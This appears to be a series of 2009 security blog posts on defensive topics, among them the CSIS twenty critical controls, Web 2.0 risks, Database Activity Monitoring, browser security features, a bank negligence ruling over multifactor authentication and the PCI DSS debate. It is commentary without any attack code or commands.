The Center for Strategic & International Studies, a think tank founded in 1962 focused on strategic defense and security issues, published a consensus driven set of "Twenty Critical Controls for Effective Cyber Defense." While aimed at federal agencies, their recommendations are applicable to commercial enterprises as well. Fifteen of the twenty can be validated at least in part in an automated manner.
Also of note, the SANS' Top Cyber Security Risks report of September 2009 refers to this document as, "Best Practices in Mitigation and Control of The Top Risks."
Here are the twenty critical controls:
Inventory of authorized and unauthorized devices
Inventory of authorized and unauthorized software
Secure configurations of hardware and software on laptops, workstations, and servers
Secure configurations for network devices such as firewalls, routers, and switches
Boundary defense
Maintenance, monitoring, and analysis of Security Audit Logs
Application software security
Controlled use of administrative privileges
Controlled access based on need to know
Continuous vulnerability assessment and remediation
Account monitoring and control
Malware defenses
Limitation and control of network ports, protocols, and services
Wireless device control
Data loss prevention
Secure network engineering
Penetration tests and red team exercises
Incident response capability
Data recovery capability
Security skills assessment and appropriate training to fill gaps
I find this document compelling because of its breadth and brevity at only 49 pages. Furthermore, for each control it lays out "Quick Wins … that can help an organization rapidly improve its security stance generally without major procedural, architectural, or technical changes to its environment," and three successively more comprehensive categories of subcontrols.
Every consultant and vendor has a theory about the top cyber security risks. But what's really going on? SANS has the answer. Last week they released their analysis of threat and vulnerability data collected from 6,000 organizations and 9 million systems during the period from March 2009 to August 2009.
SANS says that two threat types dominate the analysis, both of which are tied to Web 2.0:
Threats associated with people using Web 2.0 applications, i.e. their workstations' vulnerabilities that are not patched and are exploited when they visit web sites.
My take: While the hype around NAC has definitely waned, the importance of comprehensive and continuous end point discovery, vulnerability analysis, configuration compliance checking, and patching at the application level as well as the operating system level is increasing.
Organizations' Internet-facing web sites remain vulnerable to threats like SQL Injection and Cross-Site Scripting.
My take: It's clear that using a rigorous Software Development Life Cycle process is just not getting the job done. Web application firewalls are a must have.
The Apache.org team published the details of a recent incident where one of their web sites was breached. While the details are, of course, very technical, it provides a great learning experience for the rest of us. Dan Goodin of the Register summarized the incident.
Unfortunately, most organizations are very reluctant to even admit when they are hacked, let alone share the details of the experience. Hence the various federal and state laws forcing organizations to report incidents where people's personal and/or financial information may have been disclosed.
Given the fact that Apache produces open source software (the number one web server software), it is appropriate that they would be so open about a breach.
McKinsey's just released report on its third annual survey of the usage and benefits of Web 2.0 technology was enlightening as far as it went. However, it completely ignores the IT security risks Web 2.0 creates. Furthermore, traditional IT security products do not mitigate these risks. If we are going to deploy Web 2.0 technology, then we need to upgrade our security to, dare I say, "IT Security 2.0."
Even if Web 2.0 products had no vulnerabilities for cybercriminals to exploit, which is not possible, there is still the need for a control function, i.e. which applications should be allowed and who should be able to use them. Unfortunately traditional security vendors have had limited success with both. Fortunately, there are security vendors who have recognized this as an opportunity
and have built solutions which mitigate these new risks.
In the past, I had never subscribed to the concept of security enabling innovation, but I do in this case. There is no doubt that improved communication, learning, and collaboration within the organization and with customers and suppliers enhances the organization's competitive position. Ignoring Web 2.0 or letting it happen by itself is not an option. Therefore when planning Web 2.0 projects, we must also include plans for mitigating the new risks Web 2.0 applications create.
The Web 2.0 good news – The survey results are very positive:
"69 percent of respondents report that their companies have gained
measurable business benefits, including more innovative products and
services, more effective marketing, better access to knowledge, lower
cost of doing business, and higher revenues.
Companies that made
greater use of the technologies, the results show, report even greater
benefits. We also looked closely at the factors driving these
improvements—for example, the types of technologies companies are
using, management practices that produce benefits, and any
organizational and cultural characteristics that may contribute to the
gains. We found that successful companies not only tightly integrate
Web 2.0 technologies with the work flows of their employees but also
create a “networked company,” linking themselves with customers and
suppliers through the use of Web 2.0 tools. Despite the current
recession, respondents overwhelmingly say that they will continue to
invest in Web 2.0."
The Web 2.0 bad news – Web 2.0 technologies introduce IT security risks that cannot be ignored. The main risk comes from the fact that these applications are purposely built to bypass traditional IT security controls in order to simplify deployment and increase usage. They use techniques such as port hopping, encrypted tunneling, and browser based applications. If we cannot identify these applications and the people using them, we cannot monitor or control them. Any exploitation of vulnerabilities in these applications can go undetected until it's too late.
A second risk is bandwidth consumption. For example, unauthorized and uncontrolled consumer-oriented video and audio file sharing applications consume large chunks of bandwidth. How much? Hard to know if we cannot see them.
In case we need some examples of the bad news, just in the last few days see here, here, here, and here.
The IT Security 2.0 good news – There are new IT Security 2.0 vendors who are addressing these issues in different ways as follows:
Database Activity Monitoring – Since we cannot depend on traditional perimeter defenses, we must protect the database itself. Database encryption, another technology, is also useful. But if someone has stolen authorized credentials (very common with trojan keyloggers), encryption is of no value. I discussed Database Activity Monitoring in more detail here. It's also useful for compliance reporting when integrated with application users.
User Activity Monitoring – Network appliances designed to
monitor internal user activity and block actions that are out of
policy. Also useful for compliance reporting.
Web Application Firewalls – Web server host-based software or appliances specifically designed to analyze anomalies in browser-based applications. WAFs are not meant to be primary firewalls but rather to be used to monitor the Layer 7 fields of browser-based forms into which users enter information. Cybercriminals enter malicious code which, if not detected and blocked, can trigger a wide range of exploits. It's also useful for PCI compliance.
"Web 2.0" Firewalls – Next generation network firewalls that can detect and control Web 2.0 applications in addition to traditional firewall functions. They also identify users and can analyze content. They can also perform URL filtering, intrusion prevention, proxying, and data leak prevention. This multi-function capability can be used to generate significant cost reductions by (1) consolidating network appliances and (2) unifying policy management and compliance reporting.
I have heard this type of firewall referred to as an Application Firewall. But it seems confusing to me because it's too close to Web Application Firewall, which I described above and performs completely different functions. Therefore, I prefer the term, Web 2.0 Firewall.
In conclusion, Web 2.0 is real and IT Security 2.0 must be part of Web 2.0 strategy. Put another way, IT Security 2.0 enables Web 2.0.
Computerworld reported last week that a judge in Illinois ruled that a couple who lost $26,500 when their bank account was breached can sue the bank for negligence for not implementing "state-of-the-art" security measures which would have prevented the breach.
While bank credit card issuers have been suing credit card processors and retailers regularly to recoup losses due to breaches, this is the first time that I am aware of that a judge has ruled that a customer can sue the bank for negligence.
The more detailed blog post by attorney David Johnson, upon which the Computerworld article is based, discusses some really interesting details of this case.
The plaintiffs sued Citizens Financial Bank for negligence because it had not implemented multifactor authentication. The timeline is important here. The Federal Financial Institutions Examination Council (FFIEC) issued multifactor authentication guidelines in 2005. By 2007, when the plaintiffs' breach occurred, the bank had still not implemented multifactor authentication. The judge, Rebecca Pallmeyer of the District Court of Northern Illinois, found this two year delay unacceptable.
Two interesting complications – (1) The account from which the money was stolen was from a home equity line of credit account, not a deposit or consumer asset account. (2) This credit account was linked to the plaintiffs' business checking account. I discussed the differences between consumer and business account liability here. Fortunately for the plaintiffs, the judge brushed these issues aside and focused on the lack of multifactor authentication.
One issue that was not addressed – where was Fiserv in all of this?
They are the provider of the online banking software used by Citizens
Financial Bank. Were they offering some type of multifactor
authentication? I would assume yes, although I have not been able to
confirm this.
In conclusion, attorney David Johnson makes clear that this ruling increases the risk to banks (and possibly other organizations responsible for protecting money and/or other assets of value) if they do not implement state-of-the-art security measures.
In the last week, vulnerabilities in older versions of WordPress software have been exploited resulting in blog posts being deleted and the blog sites being used for malicious purposes. Welcome to the real world.
The shock that some people are expressing, like Robert Scoble on Scobleizer is somewhat surprising. It's clear that WordPress knew about the vulnerabilities for some time and urged self-hosting customers to upgrade to WordPress version 2.8.4. Some of those that did not, have paid the price. Here is some additional useful information.
People have been snickering for years about Microsoft's security travails. We have since learned that Microsoft does not have a monopoly on security vulnerabilities and exploits. All software products have vulnerabilities. The issue is that as a software product becomes popular, it attracts cyber criminals. Therefore, software companies, as they become successful, must increase their focus on security issues, which WordPress seems to have done.
And we as consumers of software have risk management responsibilities too:
Upgrading to current releases
Backing up regularly to increase resiliency, i.e. the ability to recover quickly from an attack.
Roger Grimes at InfoWorld's Security Central wrote a very good article about password management. I agree with everything he said, except Roger did not go far enough. For several of Roger's attack types password guessing, keystroke logging, and hash cracking, one of the mitigation techniques is strong (high entropy) passwords.
True enough. However, I am convinced that it's simply not possible to memorize really strong (high entropy) passwords.
I wrote about this earlier and included a link to a review of password managers.
The browser vendors are adding innovative security features to help protect users against web-based attacks. Here are some examples:
Firefox 3.5.3 will check your Adobe Flash add-in and warn you if it's not current. It is believed that as many as 80% of browser users are using older versions of Adobe that contain vulnerabilities that are fixed in new versions.
Internet Explorer 8 added a raft of security features including URL filtering, Cross Site Scripting (XSS) filtering, click-jack prevention, domain highlighting, and data execution prevention (requires Vista SP1). The Cross Site Scripting filter is very impressive. Here is a detailed explanation of XSS and how the IE8 filter works. XSS attacks are particularly nasty because it can
happen through no fault of yours. All you have to do is go to a site
that has been successfully exploited. Details on the other features are here.
Opera 10, just now shipping, also includes URL filtering.
Safari 4, when running on Windows, will integrate with your Windows anti-virus software to check any files, images, or other items you are downloading via Safari. It also has URL filtering watching for phishing sites and sites known to harbor malware.
Chrome 2.0.172.43 was released on August 25, 2009 and fixed several high severity issues.
Firefox has long benefited from third party security and privacy add-ons. NoScript is one of the more popular add-ons that blocks javascript and let's you selectively turn on javascript per content source.
While I have not personally checked these security features, assuming they all work as advertised, Microsoft's Internet Explorer 8 leads the way in security innovation.
I thought a post about Database Activity Monitoring was timely because one of the DAM vendors, Sentrigo, published a Microsoft SQLServer vulnerability today along with a utility that mitigates the risk. Also of note, Microsoft denies that this is a real vulnerability.
I generally don't like to write about a single new vulnerability because there are just so many of them. However, Adrian Lane, CTO and Analyst at Securosis, wrote a detailed post about this new vulnerability, Sentrigo's workaround, and Sentrigo's DAM product, Hedgehog. Therefore I wanted to put this in context.
Database Activity Monitoring is becoming a key component in a defense-in-depth approach to protecting "competitive advantage" information like intellectual property, customer and financial information and meeting compliance requirements.
One of the biggest issues organizations face when selecting a Database Activity Monitoring solution is the method of activity collection, of which there are three – logging, network based monitoring, and agent based monitoring. Each has pros and cons:
Logging – This requires turning on the database product's native logging capability. The main advantage of this approach is that it is a standard feature included with every database. Also some database vendors like Oracle have a complete, but separately priced Database Activity Monitoring solution, which they claim will support other databases. Here are the issues with logging:
You need a log management or Security Information and Event Management (SIEM) system to normalize each vendor's log format into a standard format so you can correlate events across different databases and store the large volume of events that are generated. If you already committed to a SIEM product this might not be an issue assuming the SIEM vendor does a good job with database logs.
There can be significant performance overhead on the database associated with logging, possibly as high as 50%.
Database administrators can tamper with the logs. Also if an external hacker gains control of the database server, he/she is likely to turn logging off or delete the logs.
Logging is not a good alternative if you want to block out of policy actions. Logging is after the fact and cannot be expected to block malicious activity. While SIEM vendors may have the ability to take actions, by the time the events are processed by the SIEM, seconds or minutes have passed which means the exploit could already be completed.
Network based – An appliance is connected to a tap or a span port on the switch that sits in front of the database servers. Traffic to and, in most cases, from the databases is captured and analyzed. Clearly this puts no performance burden on the database servers at all. It also provides a degree of isolation from the database administrators.Here are the issues:
Local database calls and stored procedures are not seen. Therefore you have an incomplete picture of database activity.
Your must have the network infrastructure to support these appliances.
It can get expensive depending on how many databases you have and how geographically dispersed they are.
Host based – An agent is installed directly on each database server.The overhead is much lower than with native database logging, as low as 1% to 5%, although you should test this for yourself. Also, the agent sees everything including stored procedures. Database administrators will have a hard time interfering with the process without being noticed. Deployment is simple, i.e. neither the networking group nor the datacenter team need be involved. Finally, the installation process should not require a database restart. As for disadvantages, this is where Adrian Lane's analysis comes in. Here are his concerns:
Building and maintaining the agent software is difficult and more time consuming for the vendor than the network approach. However, this is the vendor's issue not the user's.
The analysis is performed by the agent right on the database. This could mean additional overhead, but has the advantage of being able to block a query that is not "in policy."
Under heavy load, transactions could be missed. But even if this is true, it's still better than the network based approach which surely misses local actions and stored procedures.
IT administrators could use the agent to snoop on database transactions to which they would not normally have access.
Dan Sarel, Sentrigo's Vice President of Product, responded in the comments section of Adrian Lane's post. (Unfortunately there is no dedicated link to the response. You just have to scroll down to his response.) He addressed the "losing events under heavy load" issue by saying Sentrigo has customers processing heavy loads and not losing transactions. He addressed the IT administrator snooping issue by saying that the Sentrigo sensors doe not require database credentials. Therefore database passwords are not available to IT administrators.
Controversy around the PCI DSS compliance program increased recently when Robert Carr, the CEO of Heartland Payment Systems, in an article in CSO Online, attacked his QSAs saying, "The audits done by our QSAs (Qualified Security Assessors) were of no value whatsoever. To the extent that they were telling us we were secure beforehand, that we were PCI compliant, was a major problem."
Mike Rothman, Senior VP of eIQNetworks responded to Mr. Carr's comments not so much to defend PCI but to place PCI in perspective, i.e. compliance does not equal security. I discussed this myself in my post about the 8 Dirty Secrets of IT Security, specifically in my comments on Dirty Secret #6 – Compliance Threatens Security.
Eric Ogren, a security industry analyst, continued the attack on PCI in his article in SearchSecurity last week where he said, "The federal indictment this week of three men for their roles in the
largest data security breach in U.S. history also serves as an
indictment of sorts against the fraud conducted by PCI – placing the
burden of security costs onto retailers and card processors when what
is really needed is the payment card industry investing in a secure
business process."
The federal indictment to which Eric Ogren referred was that of Albert Gonzalez and others for the breaches at Heartland Payment Services, 7-Eleven, Hannaford, and two national retailers referred to as Company A and Company B. Actually this is the second federal indictment of Albert Gonzalez that I am aware of. The first, filed in Massachusetts in August 2008, was for the breaches at BJ's Wholesale Club, DSW, OfficeMax, Boston Market, Barnes & Noble, Sport Authority, and TJX.
Bob Russo, the general manager of the PCI Security Standards Council disagreed with Eric Ogren's characterizations of PCI, saying that retailers and credit card processors must take responsibility for protecting cardholder information.
Rich Mogull, CEO and Analyst at Securosis, responded to Bob Russo's article with recommendations to improve the PCI compliance program which he characterized as an "overall positive development for the state of security." He went on to say, "In other words, as much as PCI is painful, flawed, and ineffective, it
has also done more to improve security than any other regulation or
industry initiative in the past 10 years. Yes, it's sometimes a
distraction; and the checklist mentality reduces security in some environments, but overall I see it as a net positive."
Rich Mogull seems to agree with Eric Ogren that the credit card companies have the responsibility and the power to improve the technical foundations of credit card transactions. In addition, he calls the PCI Council to task for such issues as:
incomplete and/or weak compliance requirements
QSA shopping
the conflict of interest they created by allowing QSA's to perform audits and then sell security services based on the findings of the audits.
Clearly organizations have no choice but to comply with mandatory regulations. But the compliance process must be part of an overall risk management process. In other words, the compliance process is not equal to the risk management process but a component of it.
Finally, and most importantly, the enterprise risk management process must be more agile and responsive to new security threats than a bureaucratic regulatory body can be. For example, it may be some time before the PCI standards are updated to specify that firewalls must be able to work at the application level so all the the Web 2.0 applications traversing the enterprise network can be controlled. This is an important issue today as this has been a major vector for compromising systems that are then used for funds transfer fraud.